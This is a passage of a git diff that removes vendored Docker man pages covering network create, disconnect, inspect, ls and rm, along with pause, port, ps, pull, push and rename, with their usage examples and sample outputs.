-[**--ipv6**] -[**--label**[=*[]*]] -[**-o**|**--opt**=*map[]*] -[**--subnet**=*[]*] -NETWORK-NAME - -# DESCRIPTION - -Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the -built-in network drivers. If you have installed a third party or your own custom -network driver you can specify that `DRIVER` here also. If you don't specify the -`--driver` option, the command automatically creates a `bridge` network for you. -When you install Docker Engine it creates a `bridge` network automatically. This -network corresponds to the `docker0` bridge that Engine has traditionally relied -on. When launch a new container with `docker run` it automatically connects to -this bridge network. You cannot remove this default bridge network but you can -create new ones using the `network create` command. - -```bash -$ docker network create -d bridge my-bridge-network -``` - -Bridge networks are isolated networks on a single Engine installation. If you -want to create a network that spans multiple Docker hosts each running an -Engine, you must create an `overlay` network. Unlike `bridge` networks overlay -networks require some pre-existing conditions before you can create one. These -conditions are: - -* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores. -* A cluster of hosts with connectivity to the key-value store. -* A properly configured Engine `daemon` on each host in the cluster. - -The `dockerd` options that support the `overlay` network are: - -* `--cluster-store` -* `--cluster-store-opt` -* `--cluster-advertise` - -To read more about these options and how to configure them, see ["*Get started -with multi-host -network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/). - -It is also a good idea, though not required, that you install Docker Swarm on to -manage the cluster that makes up your network. Swarm provides sophisticated -discovery and server management that can assist your implementation. - -Once you have prepared the `overlay` network prerequisites you simply choose a -Docker host in the cluster and issue the following to create the network: - -```bash -$ docker network create -d overlay my-multihost-network -``` - -Network names must be unique. The Docker daemon attempts to identify naming -conflicts but this is not guaranteed. It is the user's responsibility to avoid -name conflicts. - -## Connect containers - -When you start a container use the `--network` flag to connect it to a network. -This adds the `busybox` container to the `mynet` network. - -```bash -$ docker run -itd --network=mynet busybox -``` - -If you want to add a container to a network after the container is already -running use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate using only another container's IP address or name. -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. - -You can disconnect a container from a network using the `docker network -disconnect` command. - -## Specifying advanced options - -When you create a network, Engine creates a non-overlapping subnetwork for the -network by default. This subnetwork is not a subdivision of an existing network. -It is purely for ip-addressing purposes. You can override this default and -specify subnetwork values directly using the `--subnet` option. On a -`bridge` network you can only create a single subnet: - -```bash -$ docker network create -d bridge --subnet=192.168.0.0/16 br0 -``` - -Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` -options. - -```bash -$ docker network create \ - --driver=bridge \ - --subnet=172.28.0.0/16 \ - --ip-range=172.28.5.0/24 \ - --gateway=172.28.5.254 \ - br0 -``` - -If you omit the `--gateway` flag the Engine selects one for you from inside a -preferred pool. For `overlay` networks and for network driver plugins that -support it you can create multiple subnetworks. - -```bash -$ docker network create -d overlay \ - --subnet=192.168.0.0/16 \ - --subnet=192.170.0.0/16 \ - --gateway=192.168.0.100 \ - --gateway=192.170.0.100 \ - --ip-range=192.168.1.0/24 \ - --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ - --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ - my-multihost-network -``` - -Be sure that your subnetworks do not overlap. If they do, the network create -fails and Engine returns an error. - -### Network internal mode - -By default, when you connect a container to an `overlay` network, Docker also -connects a bridge network to it to provide external connectivity. If you want -to create an externally isolated `overlay` network, you can specify the -`--internal` option. - -# OPTIONS -**--attachable** - Enable manual container attachment - -**--aux-address**=map[] - Auxiliary IPv4 or IPv6 addresses used by network driver - -**-d**, **--driver**=*DRIVER* - Driver to manage the Network bridge or overlay. The default is bridge. - -**--gateway**=[] - IPv4 or IPv6 Gateway for the master subnet - -**--help** - Print usage - -**--internal** - Restrict external access to the network - -**--ip-range**=[] - Allocate container ip from a sub-range - -**--ipam-driver**=*default* - IP Address Management Driver - -**--ipam-opt**=map[] - Set custom IPAM driver options - -**--ipv6** - Enable IPv6 networking - -**--label**=*label* - Set metadata for a network - -**-o**, **--opt**=map[] - Set custom driver options - -**--subnet**=[] - Subnet in CIDR format that represents a network segment - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md deleted file mode 100644 index 09bcac51b0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md +++ /dev/null @@ -1,36 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-disconnect - disconnect a container from a network - -# SYNOPSIS -**docker network disconnect** -[**--help**] -[**--force**] -NETWORK CONTAINER - -# DESCRIPTION - -Disconnects a container from a network. - -```bash - $ docker network disconnect multi-host-network container1 -``` - - -# OPTIONS -**NETWORK** - Specify network name - -**CONTAINER** - Specify container name - -**--force** - Force the container to disconnect from a network - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md deleted file mode 100644 index f27c98cb34..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md +++ /dev/null @@ -1,112 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-inspect - inspect a network - -# SYNOPSIS -**docker network inspect** -[**-f**|**--format**[=*FORMAT*]] -[**--help**] -NETWORK [NETWORK...] - -# DESCRIPTION - -Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: - -```bash -$ sudo docker run -itd --name=container1 busybox -f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 - -$ sudo docker run -itd --name=container2 busybox -bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 -``` - -The `network inspect` command shows the containers, by id, in its -results. You can specify an alternate format to execute a given -template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -```bash -$ sudo docker network inspect bridge -[ - { - "Name": "bridge", - "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.17.42.1/16", - "Gateway": "172.17.42.1" - } - ] - }, - "Internal": false, - "Containers": { - "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { - "Name": "container2", - "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", - "MacAddress": "02:42:ac:11:00:02", - "IPv4Address": "172.17.0.2/16", - "IPv6Address": "" - }, - "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { - "Name": "container1", - "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", - "MacAddress": "02:42:ac:11:00:01", - "IPv4Address": "172.17.0.1/16", - "IPv6Address": "" - } - }, - "Options": { - "com.docker.network.bridge.default_bridge": "true", - "com.docker.network.bridge.enable_icc": "true", - "com.docker.network.bridge.enable_ip_masquerade": "true", - "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", - "com.docker.network.bridge.name": "docker0", - "com.docker.network.driver.mtu": "1500" - } - } -] -``` - -Returns the information about the user-defined network: - -```bash -$ docker network create simple-network -69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a -$ docker network inspect simple-network -[ - { - "Name": "simple-network", - "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.22.0.0/16", - "Gateway": "172.22.0.1" - } - ] - }, - "Containers": {}, - "Options": {} - } -] -``` - -# OPTIONS -**-f**, **--format**="" - Format the output using the given Go template. - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md deleted file mode 100644 index f319e66035..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-ls.1.md +++ /dev/null @@ -1,188 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-ls - list networks - -# SYNOPSIS -**docker network ls** -[**-f**|**--filter**[=*[]*]] -[**--format**=*"TEMPLATE"*] -[**--no-trunc**[=*true*|*false*]] -[**-q**|**--quiet**[=*true*|*false*]] -[**--help**] - -# DESCRIPTION - -Lists all the networks the Engine `daemon` knows about. This includes the -networks that span across multiple hosts in a cluster, for example: - -```bash - $ docker network ls - NETWORK ID NAME DRIVER SCOPE - 7fca4eb8c647 bridge bridge local - 9f904ee27bf5 none null local - cf03ee007fb4 host host local - 78b03ee04fc4 multi-host overlay swarm -``` - -Use the `--no-trunc` option to display the full network id: - -```bash -$ docker network ls --no-trunc -NETWORK ID NAME DRIVER -18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null -c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host -7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge -95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge -63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. - -The currently supported filters are: - -* driver -* id (network's id) -* label (`label=` or `label==`) -* name (network's name) -* type (custom|builtin) - -#### Driver - -The `driver` filter matches networks based on their driver. - -The following example matches networks with the `bridge` driver: - -```bash -$ docker network ls --filter driver=bridge -NETWORK ID NAME DRIVER -db9db329f835 test1 bridge -f6e212da9dfd test2 bridge -``` - -#### ID - -The `id` filter matches on all or part of a network's ID. - -The following filter matches all networks with an ID containing the -`63d1ff1f77b0...` string. - -```bash -$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 -NETWORK ID NAME DRIVER -63d1ff1f77b0 dev bridge -``` - -You can also filter for a substring in an ID as this shows: - -```bash -$ docker network ls --filter id=95e74588f40d -NETWORK ID NAME DRIVER -95e74588f40d foo bridge - -$ docker network ls --filter id=95e -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -``` - -#### Label - -The `label` filter matches networks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches networks with the `usage` label regardless of its value. - -```bash -$ docker network ls -f "label=usage" -NETWORK ID NAME DRIVER -db9db329f835 test1 bridge -f6e212da9dfd test2 bridge -``` - -The following filter matches networks with the `usage` label with the `prod` value. - -```bash -$ docker network ls -f "label=usage=prod" -NETWORK ID NAME DRIVER -f6e212da9dfd test2 bridge -``` - -#### Name - -The `name` filter matches on all or part of a network's name. - -The following filter matches all networks with a name containing the `foobar` string. - -```bash -$ docker network ls --filter name=foobar -NETWORK ID NAME DRIVER -06e7eef0a170 foobar bridge -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker network ls --filter name=foo -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -06e7eef0a170 foobar bridge -``` - -#### Type - -The `type` filter supports two values; `builtin` displays predefined networks -(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. - -The following filter matches all user defined networks: - -```bash -$ docker network ls --filter type=custom -NETWORK ID NAME DRIVER -95e74588f40d foo bridge -63d1ff1f77b0 dev bridge -``` - -By having this flag it allows for batch cleanup. For example, use this filter -to delete all user defined networks: - -```bash -$ docker network rm `docker network ls --filter type=custom -q` -``` - -A warning will be issued when trying to remove a network that has containers -attached. - -# OPTIONS - -**-f**, **--filter**=*[]* - filter output based on conditions provided. - -**--format**="*TEMPLATE*" - Pretty-print networks using a Go template. - Valid placeholders: - .ID - Network ID - .Name - Network name - .Driver - Network driver - .Scope - Network scope (local, global) - .IPv6 - Whether IPv6 is enabled on the network or not - .Internal - Whether the network is internal or not - .Labels - All labels assigned to the network - .Label - Value of a specific label for this network. For example `{{.Label "project.version"}}` - -**--no-trunc**=*true*|*false* - Do not truncate the output - -**-q**, **--quiet**=*true*|*false* - Only display network IDs - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md deleted file mode 100644 index c094a15286..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-rm.1.md +++ /dev/null @@ -1,43 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-rm - remove one or more networks - -# SYNOPSIS -**docker network rm** -[**--help**] -NETWORK [NETWORK...] - -# DESCRIPTION - -Removes one or more networks by name or identifier. To remove a network, -you must first disconnect any containers connected to it. -To remove the network named 'my-network': - -```bash - $ docker network rm my-network -``` - -To delete multiple networks in a single `docker network rm` command, provide -multiple network names or ids. The following example deletes a network with id -`3695c422697f` and a network named `my-network`: - -```bash - $ docker network rm 3695c422697f my-network -``` - -When you specify multiple networks, the command attempts to delete each in turn. -If the deletion of one network fails, the command continues to the next on the -list and tries to delete that. The command reports success or failure for each -deletion. - -# OPTIONS -**NETWORK** - Specify network name or id - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md deleted file mode 100644 index 11eef5321f..0000000000 --- a/vendor/github.com/docker/docker/man/docker-pause.1.md +++ /dev/null @@ -1,32 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-pause - Pause all processes within one or more containers - -# SYNOPSIS -**docker pause** -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The `docker pause` command suspends all processes in the specified containers. -On Linux, this uses the cgroups freezer. Traditionally, when suspending a process -the `SIGSTOP` signal is used, which is observable by the process being suspended. -With the cgroups freezer the process is unaware, and unable to capture, -that it is being suspended, and subsequently resumed. On Windows, only Hyper-V -containers can be paused. - -See the [cgroups freezer documentation] -(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for -further details. - -# OPTIONS -**--help** - Print usage statement - -# See also -**docker-unpause(1)** to unpause all processes within one or more containers. - -# HISTORY -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md deleted file mode 100644 index 83e9cf93b6..0000000000 --- a/vendor/github.com/docker/docker/man/docker-port.1.md +++ /dev/null @@ -1,47 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT - -# SYNOPSIS -**docker port** -[**--help**] -CONTAINER [PRIVATE_PORT[/PROTO]] - -# DESCRIPTION -List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - - # docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test - -## Find out all the ports mapped - - # docker port test - 7890/tcp -> 0.0.0.0:4321 - 9876/tcp -> 0.0.0.0:1234 - -## Find out a specific mapping - - # docker port test 7890/tcp - 0.0.0.0:4321 - - # docker port test 7890 - 0.0.0.0:4321 - -## An example showing error for non-existent mapping - - # docker port test 7890/udp - 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -June 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md deleted file mode 100644 index d9aa39f8fd..0000000000 --- a/vendor/github.com/docker/docker/man/docker-ps.1.md +++ /dev/null @@ -1,145 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% FEBRUARY 2015 -# NAME -docker-ps - List containers - -# SYNOPSIS -**docker ps** -[**-a**|**--all**] -[**-f**|**--filter**[=*[]*]] -[**--format**=*"TEMPLATE"*] -[**--help**] -[**-l**|**--latest**] -[**-n**[=*-1*]] -[**--no-trunc**] -[**-q**|**--quiet**] -[**-s**|**--size**] - -# DESCRIPTION - -List the containers in the local repository. By default this shows only -the running containers. - -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all containers. Only running containers are shown by default. The default is *false*. - -**-f**, **--filter**=[] - Filter output based on these conditions: - - exited= an exit code of - - label= or label== - - status=(created|restarting|running|paused|exited|dead) - - name= a container's name - - id= a container's ID - - is-task=(true|false) - containers that are a task (part of a service managed by swarm) - - before=(|) - - since=(|) - - ancestor=([:tag]||) - containers created from an image or a descendant. - - volume=(|) - - network=(|) - containers connected to the provided network - - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status - -**--format**="*TEMPLATE*" - Pretty-print containers using a Go template. - Valid placeholders: - .ID - Container ID - .Image - Image ID - .Command - Quoted command - .CreatedAt - Time when the container was created. - .RunningFor - Elapsed time since the container was started. - .Ports - Exposed ports. - .Status - Container status. - .Size - Container disk size. - .Names - Container names. - .Labels - All labels assigned to the container. - .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}` - .Mounts - Names of the volumes mounted in this container. - -**--help** - Print usage statement - -**-l**, **--latest**=*true*|*false* - Show only the latest created container (includes all states). The default is *false*. - -**-n**=*-1* - Show n last created containers (includes all states). - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only display numeric IDs. The default is *false*. - -**-s**, **--size**=*true*|*false* - Display total file sizes. The default is *false*. - -# EXAMPLES -# Display all containers, including non-running - - # docker ps -a - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - a87ecb4f327c fedora:20 /bin/sh -c #(nop) MA 20 minutes ago Exit 0 desperate_brattain - 01946d9d34d8 vpavlin/rhel7:latest /bin/sh -c #(nop) MA 33 minutes ago Exit 0 thirsty_bell - c1d3b0166030 acffc0358b9e /bin/sh -c yum -y up 2 weeks ago Exit 1 determined_torvalds - 41d50ecd2f57 fedora:20 /bin/sh -c #(nop) MA 2 weeks ago Exit 0 drunk_pike - -# Display only IDs of all containers, including non-running - - # docker ps -a -q - a87ecb4f327c - 01946d9d34d8 - c1d3b0166030 - 41d50ecd2f57 - -# Display only IDs of all containers that have the name `determined_torvalds` - - # docker ps -a -q --filter=name=determined_torvalds - c1d3b0166030 - -# Display containers with their commands - - # docker ps --format "{{.ID}}: {{.Command}}" - a87ecb4f327c: /bin/sh -c #(nop) MA - 01946d9d34d8: /bin/sh -c #(nop) MA - c1d3b0166030: /bin/sh -c yum -y up - 41d50ecd2f57: /bin/sh -c #(nop) MA - -# Display containers with their labels in a table - - # docker ps --format "table {{.ID}}\t{{.Labels}}" - CONTAINER ID LABELS - a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd - 01946d9d34d8 - c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 - 41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd - -# Display containers with their node label in a table - - # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}' - CONTAINER ID NODE - a87ecb4f327c ubuntu - 01946d9d34d8 - c1d3b0166030 debian - 41d50ecd2f57 fedora - -# Display containers with `remote-volume` mounted - - $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" - CONTAINER ID MOUNTS - 9c3527ed70ce remote-volume - -# Display containers with a volume mounted in `/data` - - $ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" - CONTAINER ID MOUNTS - 9c3527ed70ce remote-volume - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit -February 2015, updated by André Martins -October 2016, updated by Josh Horwitz diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md deleted file mode 100644 index c61d005308..0000000000 --- a/vendor/github.com/docker/docker/man/docker-pull.1.md +++ /dev/null @@ -1,220 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-pull - Pull an image or a repository from a registry - -# SYNOPSIS -**docker pull** -[**-a**|**--all-tags**] -[**--help**] -NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] - -# DESCRIPTION - -This command pulls down an image or a repository from a registry. If -there is more than one image for a repository (e.g., fedora) then all -images for that repository name can be pulled down including any tags -(see the option **-a** or **--all-tags**). - -If you do not specify a `REGISTRY_HOST`, the command uses Docker's public -registry located at `registry-1.docker.io` by default. - -# OPTIONS -**-a**, **--all-tags**=*true*|*false* - Download all tagged images in the repository. The default is *false*. - -**--help** - Print usage statement - -# EXAMPLES - -### Pull an image from Docker Hub - -To download a particular image, or set of images (i.e., a repository), use -`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a -default. This command pulls the `debian:latest` image: - - $ docker pull debian - - Using default tag: latest - latest: Pulling from library/debian - fdd5d7827f33: Pull complete - a3ed95caeb02: Pull complete - Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa - Status: Downloaded newer image for debian:latest - -Docker images can consist of multiple layers. In the example above, the image -consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. - -Layers can be reused by images. For example, the `debian:jessie` image shares -both layers with `debian:latest`. Pulling the `debian:jessie` image therefore -only pulls its metadata, but not its layers, because all layers are already -present locally: - - $ docker pull debian:jessie - - jessie: Pulling from library/debian - fdd5d7827f33: Already exists - a3ed95caeb02: Already exists - Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e - Status: Downloaded newer image for debian:jessie - -To see which images are present locally, use the **docker-images(1)** -command: - - $ docker images - - REPOSITORY TAG IMAGE ID CREATED SIZE - debian jessie f50f9524513f 5 days ago 125.1 MB - debian latest f50f9524513f 5 days ago 125.1 MB - -Docker uses a content-addressable image store, and the image ID is a SHA256 -digest covering the image's configuration and layers. In the example above, -`debian:jessie` and `debian:latest` have the same image ID because they are -actually the *same* image tagged with different names. Because they are the -same image, their layers are stored only once and do not consume extra disk -space. - -For more information about images, layers, and the content-addressable store, -refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/) -in the online documentation. - - -## Pull an image by digest (immutable identifier) - -So far, you've pulled images by their name (and "tag"). Using names and tags is -a convenient way to work with images. When using tags, you can `docker pull` an -image again to make sure you have the most up-to-date version of that image. -For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu -14.04 image. - -In some cases you don't want images to be updated to newer versions, but prefer -to use a fixed version of an image. Docker enables you to pull an image by its -*digest*. When pulling an image by digest, you specify *exactly* which version -of an image to pull. Doing so, allows you to "pin" an image to that version, -and guarantee that the image you're using is always the same. - -To know the digest of an image, pull the image first. Let's pull the latest -`ubuntu:14.04` image from Docker Hub: - - $ docker pull ubuntu:14.04 - - 14.04: Pulling from library/ubuntu - 5a132a7e7af1: Pull complete - fd2731e4c50c: Pull complete - 28a2f68d1120: Pull complete - a3ed95caeb02: Pull complete - Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - Status: Downloaded newer image for ubuntu:14.04 - -Docker prints the digest of the image after the pull has finished. In the example -above, the digest of the image is: - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Docker also prints the digest of an image when *pushing* to a registry. This -may be useful if you want to pin to a version of the image you just pushed. - -A digest takes the place of the tag when pulling an image, for example, to -pull the above image by digest, run the following command: - - $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu - 5a132a7e7af1: Already exists - fd2731e4c50c: Already exists - 28a2f68d1120: Already exists - a3ed95caeb02: Already exists - Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Digest can also be used in the `FROM` of a Dockerfile, for example: - - FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - MAINTAINER some maintainer - -> **Note**: Using this feature "pins" an image to a specific version in time. -> Docker will therefore not pull updated versions of an image, which may include -> security updates. If you want to pull an updated image, you need to change the -> digest accordingly. - -## Pulling from a different registry - -By default, `docker pull` pulls images from Docker Hub. It is also possible to -manually specify the path of a registry to pull from. For example, if you have -set up a local registry, you can specify its path to pull from it. A registry -path is similar to a URL, but does not contain a protocol specifier (`https://`). - -The following command pulls the `testing/test-image` image from a local registry -listening on port 5000 (`myregistry.local:5000`): - - $ docker pull myregistry.local:5000/testing/test-image - -Registry credentials are managed by **docker-login(1)**. - -Docker uses the `https://` protocol to communicate with a registry, unless the -registry is allowed to be accessed over an insecure connection. Refer to the -[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries) -section in the online documentation for more information. - - -## Pull a repository with multiple images - -By default, `docker pull` pulls a *single* image from the registry. A repository -can contain multiple images. To pull all images from a repository, provide the -`-a` (or `--all-tags`) option when using `docker pull`. - -This command pulls all images from the `fedora` repository: - - $ docker pull --all-tags fedora - - Pulling repository fedora - ad57ef8d78d7: Download complete - 105182bb5e8b: Download complete - 511136ea3c5a: Download complete - 73bd853d2ea5: Download complete - .... - - Status: Downloaded newer image for fedora - -After the pull has completed use the `docker images` command to see the -images that were pulled. The example below shows all the `fedora` images -that are present locally: - - $ docker images fedora - - REPOSITORY TAG IMAGE ID CREATED SIZE - fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB - fedora 20 105182bb5e8b 5 days ago 372.7 MB - fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB - fedora latest 105182bb5e8b 5 days ago 372.7 MB - - -## Canceling a pull - -Killing the `docker pull` process, for example by pressing `CTRL-c` while it is -running in a terminal, will terminate the pull operation. - - $ docker pull fedora - - Using default tag: latest - latest: Pulling from library/fedora - a3ed95caeb02: Pulling fs layer - 236608c7b546: Pulling fs layer - ^C - -> **Note**: Technically, the Engine terminates a pull operation when the -> connection between the Docker Engine daemon and the Docker Engine client -> initiating the pull is lost. If the connection with the Engine daemon is -> lost for other reasons than a manual interaction, the pull is also aborted. - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit -April 2015, updated by John Willis -April 2015, updated by Mary Anthony for v2 -September 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md deleted file mode 100644 index 847e66d2e4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-push.1.md +++ /dev/null @@ -1,63 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-push - Push an image or a repository to a registry - -# SYNOPSIS -**docker push** -[**--help**] -NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] - -# DESCRIPTION - -Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) -registry or to a self-hosted one. - -Refer to **docker-tag(1)** for more information about valid image and tag names. - -Killing the **docker push** process, for example by pressing **CTRL-c** while it -is running in a terminal, terminates the push operation. - -Registry credentials are managed by **docker-login(1)**. - - -# OPTIONS - -**--disable-content-trust** - Skip image verification (default true) - -**--help** - Print usage statement - -# EXAMPLES - -## Pushing a new image to a registry - -First save the new image by finding the container ID (using **docker ps**) -and then committing it to a new image name. Note that only a-z0-9-_. are -allowed when naming images: - - # docker commit c16378f943fe rhel-httpd - -Now, push the image to the registry using the image ID. In this example the -registry is on host named `registry-host` and listening on port `5000`. To do -this, tag the image with the host name or IP address, and the port of the -registry: - - # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd - # docker push registry-host:5000/myadmin/rhel-httpd - -Check that this worked by running: - - # docker images - -You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` -listed. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md deleted file mode 100644 index eaeea5c6e0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rename.1.md +++ /dev/null @@ -1,15 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCTOBER 2014 -# NAME -docker-rename - Rename a container - -# SYNOPSIS -**docker rename** -CONTAINER NEW_NAME - -# OPTIONS -There are no available options. - -# 